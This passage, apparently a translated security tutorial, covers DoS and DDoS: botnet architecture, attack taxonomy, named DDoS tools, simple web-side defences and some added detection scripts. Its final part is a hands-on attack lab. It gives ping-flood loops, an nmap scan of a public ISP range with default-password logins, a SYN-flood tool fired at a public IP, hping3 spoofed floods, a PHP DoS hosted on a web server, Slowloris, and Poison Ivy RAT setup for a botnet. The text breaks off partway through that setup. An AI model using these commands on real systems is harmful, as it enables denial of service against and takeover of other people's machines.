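            mss_ok = check_cookie(src, sport, server[0], server[1], ack, now_minutes)
            if mss_ok is not None:
                established[(src, sport)] = mss_ok
    return syn_acks_sent, established


def constructed_flood(now_minutes=100):
    """1000 spoofed SYNs that never complete, plus one real client's handshake."""
    pkts = [(f"203.0.113.{i % 250 + 1}", 1024 + i, "S", 0, 1460) for i in range(1000)]
    cookie = make_cookie("192.0.2.10", 40000, "10.0.0.5", 80, 1460, now_minutes)
    pkts += [("192.0.2.10", 40000, "S", 0, 1460),
             ("192.0.2.10", 40000, "A", (cookie + 1) & 0xFFFFFFFF, 0)]
    return pkts


if __name__ == "__main__":
    print(handle_stream(constructed_flood(), 100))
```

The price of the scheme is that TCP options which do not fit in the cookie (window scaling, SACK) are lost for connections set up this way, which is why Linux only switches cookies on once the real backlog overflows (`net.ipv4.tcp_syncookies = 1`) rather than for every connection.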


Part III: DDoS

I. The concept of DDoS (Distributed Denial of Service)
Distributed Denial of Service (DDoS) is an attack technique that worries ISPs. The legitimate hacker community does not acknowledge DDoS as a respectable attack technique, yet black hats gain a great deal of advantage from deploying it.

II. Phases of a DDoS attack
There are three phases:
1. Preparation: the attacker prepares the tool for the attack, which typically follows a client-server model. The attacker can write this software or download it easily; at the time of writing there are reportedly more than 10 DDoS tools freely available on the Internet (analysed in detail later). Next, other hacking techniques are used to take over a number of hosts on the network and install the needed software on them. Configu­ring and testing the whole attack-network (the set of commandeered machines with that software installed, plus the attacker's own machine or others set up as launch points) is also done in this phase.
2. Choosing the target and the moment: after settling on the final target, the attacker steers the attack-network toward it. Timing decides how much damage is done and how quickly the target can respond.
3. Launching the attack and erasing traces: at the chosen moment the attacker launches from their own machine; the command may pass through several layers before reaching the hosts that actually attack. The whole attack-network (possibly thousands of machines) continuously drains the target server's capacity, preventing it from operating as designed. After a suitable period the attacker erases any trace that could be followed back to them; this demands high skill and is not strictly necessary.

III. Overview of the DDoS attack-network architecture
In general a DDoS attack-network follows one of two main models: the Agent-Handler model and the IRC-based model.


Below is the diagram (rendered here as an outline) of the two attack-network models and their command channels:

DDoS attack-network
  Agent-Handler
    Client-Handler communication: TCP, UDP, ICMP
  IRC-based
    Client-Handler communication: secret/private channel, public channel
    Transport: TCP, UDP, ICMP

1. The Agent-Handler model
In this model the attack-network has three components: Agent, Client and Handler.
Client: the software the attacker uses to control every activity of the attack-network.
Handler: an intermediate software component between the Agents and the Client.
Agent: the software component that actually attacks the target, taking orders from the Client through the Handlers.

Architecture of an Agent-Handler attack-network (figure): Attacker(s) -> Handlers -> Agents -> Victim
The attacker uses the Client to talk to the Handlers in order to find out how many Agents are online, adjust the attack time, and update the Agents. Depending on how the attacker configures the attack-network, each Agent is managed by one or several Handlers. The attacker usually places the Handler software on a router or a server that carries a lot of traffic, so that the Client-Handler-Agent communication is hard to spot. This communication normally runs over TCP, UDP or ICMP. The real owners of the Agent hosts usually have no idea they are being used in a DDoS attack, because they lack the knowledge or because backdoor programs were installed; the Agent uses so little of the host's resources that its effect on performance is practically invisible.

2. The IRC-based model
Internet Relay Chat (IRC) is a multi-user online chat system; it lets a user open a multipoint connection to many other users and chat in real time. An IRC network consists of many IRC servers across the Internet, talking to each other over many channels. IRC lets users create three kinds of channel: public, private and secret.
Public channel: lets every user on the channel see the IRC names and receive the messages of all other users on it.
Private channel: designed for communication among permitted parties; users outside the channel cannot see the IRC names or the messages on it, but a user outside it can still learn that the private channel exists with channel-locator commands.
Secret channel: like a private channel, but cannot be found with a channel locator.

Architecture of an IRC-based attack-network (figure):
Attacker Attacker

IRC NETWORK

Agent

Agent

Agent

Agent

Agent

Victim
An IRC-Based network is similar to the Agent-Handler network, but this model uses IRC channels as the means of communication between Client and Agent (no Handler is used). With this model the attacker gains some further advantages, such as:
+ The communications take the form of chat messages, which makes detecting them extremely difficult
+ IRC traffic can move across the network in large volumes without raising suspicion
+ No list of Agents needs to be maintained; the hacker only has to log on to the IRC server to receive reports on the state of the Agents, sent by the channel.
+ Finally: IRC is also a file-sharing environment, which makes it easy to spread Agent code to many other machines.

IV: Classification of DDoS attack types
In general there are very many variants of the DDoS attack technique, but viewed technically these variants can be divided into two classes according to the attack's purpose: exhausting bandwidth and exhausting system resources. Below is a diagram classifying the kinds of DDoS attack.

[Figure: taxonomy of DDoS attacks]
DDoS attack
- Bandwidth Depletion
  - Flood Attack
    - UDP (Random Port Attack, Static Port Attack; Spoof Source Attack)
    - ICMP (Spoof Source Attack)
  - Amplification Attack
    - Smurf attack (Spoof Source Attack)
    - Fraggle Attack (Direct Attack, Loop Attack; Spoof Source Attack)
- Resource Depletion
  - Protocol Exploit Attack
    - TCP SYN Attack (Spoof Source Attack)
    - PUSH + ACK Attack (Spoof Source Attack)
  - Malformed Packet Attack
    - IP @ Attack
    - IP Packet Options Attack

1. Attack types that exhaust bandwidth
A BandWidth Depletion Attack is designed to flood the target network with unnecessary traffic, with the aim of minimising the ability of legitimate traffic to reach the target's service system. There are two kinds of BandWidth Depletion Attack:
Flood attack: directs the Agents to send a large volume of traffic to the target's service system, exhausting its capacity and bandwidth.
Amplification attack: directs the Agents, or the Client itself, to send messages to a broadcast IP address, causing every machine in that subnet to send messages to the target's service system. This method multiplies unnecessary traffic and degrades the target's bandwidth.
1.1. Flood attack
In this method the Agents send a large volume of IP traffic that slows down the target's service system, hangs it, or drives it into a saturated state, so that the system's real Users cannot use the service.
Flood Attacks can be divided into two kinds:
UDP Flood Attack: because of UDP's connectionless nature, a system receiving UDP messages simply accepts every packet as something it must process. A large volume of UDP packets sent to the target's service system pushes the whole system to its limit. These UDP packets can be sent to many arbitrary ports or to a single port. Usually they are sent to many ports, forcing the target system to strain to handle responses for these packets. If the attacked port is not open, the target system sends back an ICMP packet of the type destination port unreachable. Usually the Agent software uses spoofed IP addresses to hide its tracks, so the messages returned because no port handled them go to some other IP address. A UDP Flood attack can also affect connections around the target because packets converge on it very heavily.
ICMP Flood Attack: ICMP was designed for network management and for locating network devices. When the Agents send a large volume of ICMP_ECHO_REPLY to the target system, the system must reply with a corresponding number of packets, which congests the link. As in the case above, the Agents' IP addresses may be spoofed.
1.2. Amplification Attack
An Amplification Attack aims to use the IP broadcast address support in routers to amplify and redirect the attack. This function lets the sender specify a single broadcast IP address for the whole receiving subnet instead of many addresses. The router is responsible for delivering the broadcast packet it receives to every IP address in the subnet. The attacker can send broadcast messages directly or through a number of Agents to increase the intensity of the attack. If the attacker sends the messages directly, the systems inside the broadcast network can be exploited as Agents.

[Figure: Attacker/Agent sends packets with the VICTIM's address to the Amplifier Network System; every host in the amplifier network replies to the VICTIM.]

Amplification attacks can be divided into two kinds, Smurf and Fraggle attack:
Smurf attack: in this attack the attacker sends packets to a network amplifier (a router or other network device that supports broadcast) with the victim's address as the source. The packets used are usually ICMP ECHO REQUEST, which ask the receiver to answer with an ICMP ECHO REPLY packet. The network amplifier delivers the ICMP ECHO REQUEST packet to every system belonging to the broadcast address, and all of those systems send REPLY packets to the IP address of the Smurf Attack target.
Fraggle Attack: similar to the Smurf attack, but instead of ICMP ECHO REQUEST packets it uses UDP ECHO packets sent to the target. There is in fact another variant of the Fraggle attack that sends UDP ECHO packets to the chargen port (port 19/UNIX) of the target, with the sender address set to the target's echo port (port 7/UNIX), creating an infinite loop. The attacker launches the attack with an ECHO REQUEST whose destination is a broadcast address; every system at that address immediately sends a REPLY to the victim's echo port, then from the victim an ECHO REPLY is sent back to the broadcast address, and the process can continue. This is exactly why a Fraggle Attack is far more dangerous than a Smurf Attack.

2: Attack types that exhaust resources
By definition: a Resource Depletion Attack is an attack in which the Attacker sends packets that use protocols contrary to their designed function, or sends malformed packets, to clog network resources so that those resources cannot serve other normal users.

2.1. Protocol Exploit Attack
TCP SYN Attack: Transfer Control Protocol supports highly reliable transmission, so it uses a handshake between sender and receiver before transferring data. In the first step the sender sends a SYN REQUEST packet (Synchronize). If the receiver gets the SYN REQUEST it answers with a SYN/ACK REPLY packet. In the final step the sender transmits the last packet, ACK, and begins transferring data.

[Figure: TCP three-way handshake. The TCP Client (Client Port 1024-65535) sends SYN to the TCP Server (Service Port 1-1023, here 80); the server answers SYN/ACK; the client sends ACK.]

If the server answers a SYN request with a SYN/ACK REPLY but does not receive the final ACK packet within a set time, it resends the SYN/ACK REPLY until the timeout expires. All the system resources reserved to handle the session, had the final ACK packet arrived, stay tied up until the timeout expires.

[Figure: a Malicious TCP Client sends a SYN packet with a deliberately fraudulent (spoofed) source IP return address to the Victim TCP Server (port 80); the server's SYN/ACK goes to an unknown host (?) and is never acknowledged.]

Having grasped this weakness, the attacker sends a SYN packet to the victim with a spoofed sender address; as a result the victim sends the SYN/ACK REPLY to some other address and never receives the final ACK packet. Only when the timeout expires does the victim recognise this and release the system resources. However, if spoofed SYN packets arrive in large numbers and rapidly, the victim's system can run out of resources.

[Figure: a normal Client completes SYN, SYN/ACK, ACK with the Server, while an Attacker/Agent sends only SYN and the Server's SYN/ACK replies go unanswered.]

PUSH + ACK Attack: In the TCP protocol, packets are held in a buffer; when the buffer is full the packets are passed on to where they are needed. However, the sender can ask the system to unload the buffer before it is full by sending a packet with the PUSH and ACK bits set to 1. Such packets make the victim's system unload all the data in the TCP buffer immediately and send back an ACK packet when done; if this happens continuously with many Agents, the system cannot handle the large volume of packets sent to it and hangs.
2.2. Malformed Packet Attack
A Malformed Packet Attack is an attack mechanism that uses the Agents to send packets with a non-standard structure in order to make the victim's system hang. There are two kinds of Malformed Packet Attack:
IP address attack: uses packets whose source and destination addresses are identical, which the victim's operating system cannot process, so it hangs.
IP packet options attack: randomises the OPTION field in the IP packet and sets all the QoS bits to 1, which forces the victim's system to spend time analysing it; with a large number of Agents this can exhaust the victim's processing capacity.

V: Some characteristics of DDoS attack tools
[Figure: comparison of DDoS tool characteristics]
DDoS software tool
- Agent Setup
  - Installation: Active (Backdoor, Trojan, Buffer Overflow); Passive (Bugged website, Corrupted File)
  - Hide with rootkit: Yes / No
  - Agent Activation Methods: Actively Poll / Live & wait
  - OS supported: Unix, Solaris, Linux, Windows
- Attack Network Communication
  - Protocol: TCP, UDP, ICMP
  - Encryption: Agent-Handler (Yes: Client-Handler, Agent-Handler; No: None); IRC-Based (Yes: Private/Secret; No: Public)

DDoS attack tools have a great deal in common on the software side. Some common points can be listed: the Agent software installation mechanism, the communication method between attacker, handler and Agent, and the operating systems these tools support. The diagram above gives a comparative overview of these DDoS attack tools.

1: Agent installation method

The Attacker can use active and passive methods to install agent software on other machines in order to set up an attack-network of the Agent-Handler or IRC-based type.
Active installation methods:
Scanning: use tools such as Nmap and Nessus to find holes in systems that are online, in order to install Agent software. Nmap returns information about a system specified by IP address; Nessus searches arbitrary IP addresses for a given, already known weakness.
Backdoor: after obtaining a list of exploitable systems, the attacker breaks in and installs the Agent software on them. A great deal of information on intrusion methods is freely available on the net, such as the site of the Common Vulnerabilities and Exposures (CVE) organisation, which lists and classifies over 4,000 types of flaw across all existing systems. This information is always available to network administrators and hackers alike.
Trojan: a program that performs some ordinary function but also has hidden functions serving the author's own purposes, which the user cannot know about. A trojan can be used as Agent software.
Buffer Overflow: by exploiting a buffer overflow flaw, the attacker can divert the normal program's execution path to the hacker's program (located in the written data area). This mechanism can be used against a program with a buffer overflow weakness to make it run the Agent software.
Passive installation methods:
Bugged Website: the attacker can exploit flaws in a web browser to install Agent software on the machine of a visiting user. The attacker creates a website whose content hides code and commands to trap the user. When the user views the website's content, the website secretly downloads and installs the Agent software. The Microsoft Internet Explorer web browser is often the target of this installation mechanism, with ActiveX flaws that can let the IE browser automatically download and install code on the machine of the user browsing the web.
Corrupted file: another method is to embed code into ordinary files. When the user reads or runs such a file, their machine is immediately infected with the Agent software.
One common technique is to give the file a very long name; because operating systems by default show only the start of the file name, the attacker can e-mail the victim a file such as: iloveyou.txt_hiiiiiii_NO_this_is_DDoS.exe; since only the part Iloveyou.txt is shown, the user opens the file to read it, the file immediately executes, and the Agent code is installed on the victim's machine. There are many other mechanisms as well, such as file disguise and file binding.
Rootkit: programs used to erase traces of the presence of an Agent or Handler on the victim's machine. Rootkits are usually used on machines where Handler software is installed, which play a vital role in the operation of the attack-network, or in environments where the chance of the Handler being detected is very high. Rootkits are rarely used on Agents, because an Agent's importance is low and losing some Agents does not affect the attack-network much.

2: Communication on the Attack-Network
Protocol: communication on the attack-network can be carried out over the protocols TCP, UDP and ICMP.
Encrypting communications: some DDoS tools support encrypting communications across the entire attack-network. Depending on the protocol used for communication there are suitable encryption methods. If the attack-network uses IRC-based communication, private and secret channels support encrypted communication.
Agent activation mechanism: there are two main methods of activating Agents. The first is for the Agent to regularly poll the Handler or IRC channel for instructions (active Agent). The second is for the Agent simply to lie in wait for instructions from the Handler or IRC Channel.
3: Platforms supporting Agents

DDoS tools are usually designed to work compatibly with many different operating systems such as Unix, Linux, Solaris or Windows. The components of the attack-network can run on different operating system environments. Usually the Handler runs on systems hosted on large servers such as Unix, Linux or Solaris. Agents usually run on the most popular operating system, Windows, since large numbers are needed and they are easy to exploit.

VI: Some DDoS tools

Based on the common foundation described above, many tools have been written; usually these tools are open source, so their complexity keeps growing and many new variants appear.
1: DDoS tools using Agent-Handler:
TrinOO: one of the first DDoS tools to be widely distributed. TrinOO has an Agent-Handler architecture; it is a DDoS tool of the Bandwidth Depletion Attack kind, using the UDP flood technique. The first versions of TrinOO did not support IP address spoofing. The TrinOO Agent is installed by exploiting a remote buffer overrun flaw. It runs on the operating systems Solaris 2.5.1 and Red Hat Linux 6.0. The attack network communicates using TCP (attacker client and handler) and UDP (Handler and Agent). Communications are encrypted with a symmetric encryption method between Client, handler and Agent.
Tribe Flood Network (TFN): Agent-Handler architecture; a DDoS tool supporting both the Bandwidth Depletion Attack and Resource Depletion Attack kinds. It uses the techniques UDP flood, ICMP Flood, TCP SYN and Smurf Attack. The first versions did not support IP address spoofing; the TFN Agent is installed by exploiting a buffer overflow flaw. It runs on Solaris 2.x and Red Hat Linux 6.0. The attack network communicates using ICMP ECHO REPLY packets (TFN2K adds TCP/UDP with the ability to choose the protocol at will); communications are not encrypted (TFN2K supports encryption).

Stacheldraht: a variant of TFN with the added ability to update Agents automatically. Communication is by telnet with symmetric encryption between Attacker and Handler.
Shaft: a variant of TrinOO; Handler-Agent communication is over UDP, Attacker-Handler over the Internet. Attacks use the UDP, ICMP and TCP flood techniques, and several attack types can be combined at once. Detailed statistics let the attacker know the victim's state of damage and the scale of the attack in order to adjust the number of Agents.
2. DDoS tools using IRC-Based:
DDoS tools using IRC-based communication were developed after the Agent-Handler tools. However, the IRC-based DDoS tools are far more complex, because they incorporate many features of the Agent-Handler DDoS tools.
Trinity: a typical example of this kind of tool. Trinity has almost every attack technique, including: UDP, TCP SYN, TCP ACK, TCP fragment, TCP NULL, TCP RST, TCP random flag, TCP ESTABLISHED packet flood. It has a built-in ability to randomise the sender address. Trinity also supports TCP flood packets with the ability to randomise the CONTROL FLAG set. Trinity can be called one of the most dangerous DDoS tools.
Other DDoS tools also deserve mention, such as Knight, designed to run on Windows, which uses the installation technique of the trojan Back Orifice. Knight uses attack techniques such as SYN, UDP Flood and Urgent Pointer Flooder. Finally there is Kaiten, a variant of Knight, which supports many attack techniques such as UDP, TCP flood, SYN and PUSH + ACK attack. Kaiten also inherits Trinity's ability to randomise spoofed addresses.

VII: ANTI-DDOS techniques

A DDOS attack, also called a denial of service attack, is simply understood as creating a wave of fake visits to a website address at a predetermined moment in order to bring down the hosting server, making it run slowly or not at all. In truth there is no single most effective anti-DDOS method, but against small-scale, non-professional attacks that use pre-programmed software we can defend ourselves completely.
Method 1: Anti-iframe
This method is considered the most primitive. The attacker borrows a website with a large number of visits and inserts iframes pointing to the target website, then runs a refresh (reload) command many times, or writes a flash file with the same effect and places it on the website; when users visit this website they unwittingly become attackers of the other site. Against this kind of attack you can defend yourself completely by inserting a piece of JavaScript that prevents other websites from iframing your website.

<script language="JavaScript">
if (top.location != self.location) {top.location = self.location}
</script>

Method 2: Anti-reload of the web page

Another kind of attack is a group of people holding down the F5 key continuously, or using pre-programmed software with the same effect (reloading the web page continuously at preset intervals), so that your web page reloads (reloads) continuously. This can consume the site's bandwidth or slow the site down with these fake connections. Against this attack method, using the defence from Method 1 is effectively useless. If you are attacked in this way, set up a .htaccess file with the content:

RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?daklak\.org [NC]
RewriteCond %{HTTP_USER_AGENT} !bingbot [NC]
RewriteCond %{HTTP_USER_AGENT} !YandexImages [NC]
RewriteCond %{HTTP_USER_AGENT} !YandexBot [NC]
RewriteCond %{HTTP_USER_AGENT} !Googlebot [NC]
RewriteCond %{HTTP_USER_AGENT} !Slurp [NC]
RewriteCond %{HTTP_USER_AGENT} !crawler [NC]
RewriteCond %{HTTP_USER_AGENT} !msnbot [NC]
RewriteCond %{HTTP_USER_AGENT} !alexa [NC]
RewriteRule !antiddos\.phtml http://daklak.org/antiddos.phtml?%{REQUEST_URI} [QSA]

The effect of the .htaccess above is to filter out referers coming from other sites while search bots keep working normally. Then create an additional file antiddos.phtml with the content:

<?php
$text = $_SERVER['QUERY_STRING'];
$text = preg_replace("#php\&#si", 'php?', $text);
// Escape the query string before echoing it into HTML.
$text = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
echo('<center><a href="http://daklak.org/?' . $text . '"><font color="blue">[Click here to continue]</font></a></center>');
?>

Change daklak.org to your web address, then upload these 2 files to the website's root directory. This way, whenever the website is visited, the first visit shows a notice asking for a mouse click before you can enter the website, and later visits do not; pre-programmed DDOS software is stopped at the step of clicking on the web page on the first visit, so reloading the page only fetches a small HTML page that does not affect the system much. Note that this method only applies to websites on a server running Linux.
Method 3: Limit the number of connections to the website at one moment

When a visitor accesses the website, a query connection is created to the database (DB) to fetch information and return it for display on the website. Each server only allows a limited number of query connections, and when this limit is exceeded access becomes difficult or impossible. Hackers exploit this to create fake visits and fake connections through proxies or, more professionally, a botnet, in order to bring down the web page and break the website's DB. To limit this we can proactively cap the number of query connections (visits) at one moment. You add the following code to the website's home page:

<?php
function server_busy($number) {
    // THIS_IS == 'WEBSITE' is a constant defined by the site's own framework;
    // drop that condition if your site does not define it.
    // /proc/loadavg is read and its first field (the 1-minute load average)
    // is compared against $number.
    if (THIS_IS == 'WEBSITE' && PHP_OS == 'Linux' and @file_exists('/proc/loadavg')
        and $filestuff = @file_get_contents('/proc/loadavg')) {
        $loadavg = explode(' ', $filestuff);
        if (trim($loadavg[0]) > $number) {
            print '<meta http-equiv="content-type" content="text/html; charset=UTF-8" />';
            print 'Lượng truy cập đang quá tải, mời bạn quay lại sau vài phút.';
            exit(0);
        }
    }
}
$srv = server_busy(1000); // 1000 is the number of visitors at one moment
?>

The code above means 1000 people are allowed online on the website at one moment. If 1000 is exceeded, visitors receive the notice: Lượng truy cập đang quá tải. Mời bạn quay lại sau vài phút. (The site is overloaded. Please come back in a few minutes.) Note that this code only applies to the PHP programming language.
Method 4: Block the attacking country's IPs with .htaccess

When IPs from some country attack heavily, you can block all of that country's IPs by going to this web page http://www.countryipblocks.net/count...elect-formats/ then ticking .htaccess deny, finding the Country in the list below, and copying the IP list into the .htaccess file (place the .htaccess file in the root directory).
These are just 4 simple defence methods for small attacks. For your website to run well and withstand large-scale attacks you should:
- Optimise the website; for example, build a cache for the website to reduce connections to the DB.
- Choose a good web hosting provider that is able to cope with attacks.
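The reload flood of Method 2 also shows up in the web server's access log as one client fetching the same page far faster than a person pressing F5 could. The following is an added example, not code from the original document: a sliding-window counter over Apache combined-format log lines that flags such clients while exempting the same search bots the .htaccess above lets through. The log lines, IPs and user-agents are constructed.

```python
"""Flag clients that reload a page at a rate no human produces.

Added example (not from the original document): a log-side check for the
reload (F5) flood described in Method 2. The Apache combined log lines below
are constructed; the bot allow-list mirrors the .htaccess rules above.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" log format: ip ident user [ts] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Same crawlers the .htaccess exempts (case-insensitive substring match).
ALLOWED_BOTS = ("bingbot", "yandeximages", "yandexbot", "googlebot",
                "slurp", "crawler", "msnbot", "alexa")


def _line(ip, second, ua, referer="-"):
    """Build one constructed log line at 12:00:<second> for the sample below."""
    return (f'{ip} - - [10/Oct/2012:12:00:{second:02d} +0700] "GET / HTTP/1.1" '
            f'200 512 "{referer}" "{ua}"')


# Constructed sample: one client reloading every second, a crawler doing the
# same (exempt), and a normal visitor arriving three times in forty seconds.
SAMPLE_LOG = (
    [_line("203.0.113.9", s, "Mozilla/5.0 (Windows NT 5.1)") for s in range(8)]
    + [_line("192.0.2.10", s, "Mozilla/5.0 (compatible; Googlebot/2.1)") for s in range(8)]
    + [_line("198.51.100.4", s, "Mozilla/5.0", "http://daklak.org/") for s in (0, 20, 40)]
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def is_allowed_bot(user_agent):
    """True when the user-agent names one of the exempted search crawlers."""
    ua = user_agent.lower()
    return any(bot in ua for bot in ALLOWED_BOTS)


def find_reload_floods(lines, window_seconds=10, max_hits=5):
    """Return {ip: peak_hits} for clients exceeding max_hits inside any window.

    Lines must be in time order per client (as a real access log is); the
    per-client deque keeps only timestamps inside the trailing window.
    """
    recent = defaultdict(deque)
    peak = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or is_allowed_bot(rec["ua"]):
            continue
        window = recent[rec["ip"]]
        window.append(rec["ts"])
        while (rec["ts"] - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) > max_hits:
            peak[rec["ip"]] = max(peak.get(rec["ip"], 0), len(window))
    return peak


if __name__ == "__main__":
    for ip, hits in find_reload_floods(SAMPLE_LOG).items():
        print(f"{ip}: {hits} requests within 10 s")
```

The flagged addresses are the candidates for the .htaccess deny list of Method 4, applied per client rather than per country.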

Part 4: Some DoS and DDoS attack methods

1. Ping of Death Attack
- In the Windows operating system we can use the command ping IP -t -l 5000 to ping a destination continuously

If you want to open 20 Windows ping windows at once, you can combine it with the For command as follows: For /L %i in (1,1,20) do start ping 192.168.1.254 -t -l 36000 ; this way the program opens 20 ping windows at once, pinging the IP 192.168.1.254 continuously

2. SYN Flood Attack
In this section we try a SYN Flood Attack against an ADSL router. First we determine how many ADSL routers currently have port 80 open, using the Nmap tool. Suppose our current public IP is 118.68.226.103; we use the command nmap -sS -p 80 118.68.226.1/24 to scan

We run the scan and write the output to the file scan_adsl.txt

Check the contents of scan_adsl.txt and pick an IP to continue the lab with

For example, a section of scan_adsl.txt with the content below means that the IP 118.68.226.7 has port 80 open
Nmap scan report for adsl-dynamic-pool-xxx.hcm.fpt.vn (118.68.226.7)
Host is up (0.037s latency).
PORT STATE SERVICE
80/tcp open http

We open a web browser to check the web page of this IP and try logging in with the default username: admin and password admin

We will run a syn flood attack on port 80 of this ADSL router with the tool syn-flood-alpha1.tar.gz. We carry out the installation as below.

root@bt:~/Desktop# ls
scan_adsl.txt syn-flood-alpha1.tar.gz
root@bt:~/Desktop# tar -xvf syn-flood-alpha1.tar.gz
syn-flood/
syn-flood/Makefile
syn-flood/gpl.txt
syn-flood/syn-flood.cpp
root@bt:~/Desktop# cd syn-flood
root@bt:~/Desktop/syn-flood# ls
gpl.txt Makefile syn-flood.cpp
root@bt:~/Desktop/syn-flood# make
g++ -O2 -g -Wall -fmessage-length=0 -c -o syn-flood.o syn-flood.cpp
g++ -o syn-flood syn-flood.o

We carry out the attack with the command below, sending 100000 syn packets
root@bt:~/Desktop/syn-flood# ./syn-flood
Usage: ./syn-flood --ip IP --port PORT [verbose]
-h --help Display this usage information.
-i --ip Destination IP address.
-p --port Destination port.
-n --num Number of packets to send.
-v --verbose Print verbose messages.
root@bt:~/Desktop/syn-flood# ./syn-flood -i 118.68.226.7 -p 80 -n 1000000
Sent 1000000 packets.

We use Wireshark to analyse how this tool operates and see the program send 100000 TCP SYN packets to the victim, the ADSL router with IP 118.68.226.7, with the source IPs being various spoofed IPs.

3. Using Hping3 to perform a SYN Flood Attack
The victim machine has IP 192.168.1.101/24 (Windows XP) and the attacker machine has IP 192.168.1.100/24 (BackTrack 5)
First we scan the Victim's open ports with the Nmap tool
root@bt:~# nmap -sS 192.168.1.101
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:9F:87:19 (VMware)
We use hping3 to SYN Flood the open port 445
root@bt:~# man hping3 => check hping3's parameters
root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 => perform a SYN FLOOD against the victim with IP 192.168.1.101
-a spoof the IP 192.168.1.254
-p port 445
-S perform a Syn Flood attack
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.

root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 -c 100000 - meaning count; we send 100000 to the victim
On the Victim machine, if it is under SYN Flood, we check the connection state with the command netstat -ano and see very many SYN connections appear
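The netstat check above is the victim-side symptom of the SYN attack explained in Part III, 2.1: connections parked in SYN_RECEIVED whose final ACK never arrives. The following is an added example, not code from the original document: it parses `netstat -ano` output, counts half-open connections per local port and per foreign IP, and raises an alert when a port's count exceeds a threshold. The netstat sample, addresses and threshold are constructed.

```python
"""Spot SYN-flood symptoms in Windows `netstat -ano` output.

Added example (not from the original document). A SYN flood leaves many
entries in SYN_RECEIVED on the attacked local port; with a spoofed source
(hping3 -a) they appear to come from one or a few foreign IPs. The sample
below is constructed.
"""
import re
from collections import Counter, defaultdict

# Constructed sample of `netstat -ano` on a host whose port 445 is being
# flooded; the two ESTABLISHED lines are normal traffic.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.1.101:445      192.168.1.254:1025     SYN_RECEIVED    4
  TCP    192.168.1.101:445      192.168.1.254:1026     SYN_RECEIVED    4
  TCP    192.168.1.101:445      192.168.1.254:1027     SYN_RECEIVED    4
  TCP    192.168.1.101:445      192.168.1.254:1028     SYN_RECEIVED    4
  TCP    192.168.1.101:445      10.0.0.7:51515         SYN_RECEIVED    4
  TCP    192.168.1.101:139      192.168.1.50:49200     ESTABLISHED     4
  TCP    192.168.1.101:3389     192.168.1.50:49310     ESTABLISHED     1200
  UDP    0.0.0.0:137            *:*                                    4
"""

# Proto, local address, foreign address, state, PID; UDP lines carry no state.
TCP_LINE = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")


def parse_tcp_lines(text):
    """Yield (local_addr, foreign_addr, state) for each TCP line of the output."""
    for line in text.splitlines():
        m = TCP_LINE.match(line)
        if m:
            local, foreign, state, _pid = m.groups()
            yield local, foreign, state


def half_open_summary(text):
    """Map each local port to a Counter of foreign IPs holding SYN_RECEIVED entries."""
    summary = defaultdict(Counter)
    for local, foreign, state in parse_tcp_lines(text):
        if state != "SYN_RECEIVED":
            continue
        # rsplit on the last ':' so bracketed IPv6 addresses also split correctly.
        local_port = local.rsplit(":", 1)[1]
        foreign_ip = foreign.rsplit(":", 1)[0]
        summary[local_port][foreign_ip] += 1
    return summary


def syn_flood_alerts(text, max_half_open=100):
    """Return one alert per local port whose half-open count exceeds max_half_open.

    Set the threshold above the port's normal backlog; on a real host the
    symptom is hundreds or thousands of SYN_RECEIVED entries, not a handful.
    """
    alerts = []
    for port, sources in sorted(half_open_summary(text).items()):
        total = sum(sources.values())
        if total > max_half_open:
            top_ip, top_n = sources.most_common(1)[0]
            alerts.append({
                "port": port,
                "half_open": total,
                "distinct_sources": len(sources),
                "top_source": top_ip,
                "top_source_share": top_n / total,
            })
    return alerts


if __name__ == "__main__":
    # Threshold lowered only so the tiny constructed sample triggers.
    for alert in syn_flood_alerts(SAMPLE_NETSTAT, max_half_open=3):
        print(alert)
```

A high top_source_share with a single foreign IP matches the spoofed-source case of the hping3 lab; a flood from a tool that randomises sources instead shows a large distinct_sources count on the same port.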

4. PHP DoS
- We will upload the PHP DoS source to a Web Server and use this server to attack another server.
- First we upload the source of the PHP DoS program to the Web Server

Restart the apache service

We use a web browser to connect to the PHP DoS page and carry out the attack on some victim

After the attack finishes, the program reports the number of packets to us.

Using wireshark to capture the traffic, we get the image below.

5. Apache DoS Slowloris
Slowloris affects the web servers Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer...; the Windows web servers IIS 6.0 and IIS 7.0 are not affected by this tool. Download the program's source code at http://ha.ckers.org/slowloris/slowloris.pl and save it as a file named slowloris.pl. Give the program execute permission.

Check whether slowloris detects the timeout value

Perform the DoS on a victim with the command perl ./slowloris.pl -dns www.abc.com -timeout 2000 -num 500 -tcpto 5; see the program's help section for the meaning of the variables

6. Using Poison Ivy to create a Botnet
First we need to create a Remote Access Trojan file and send it to the victim. After installation, the victim machine becomes a zombie controlled by the attacker. Decompress the program and run the Poison Ivy file

Click I Agree, then choose New Server

Next we choose to create a New Profile

We enter the parameters:

o The IP of the machine acting as the server that the zombies connect back to, and the corresponding port. By default the program uses port 3460. We can also create several profiles, each corresponding to one port on the attacker's machine
o Enter the ID: for example server_test
o The login password can be a static password or a dynamic key
o Click Next at the bottom right of the screen

Next the program moves to the Install section. We enter the following parameters
o HKLM/Run Name:
o ActiveX Key Name
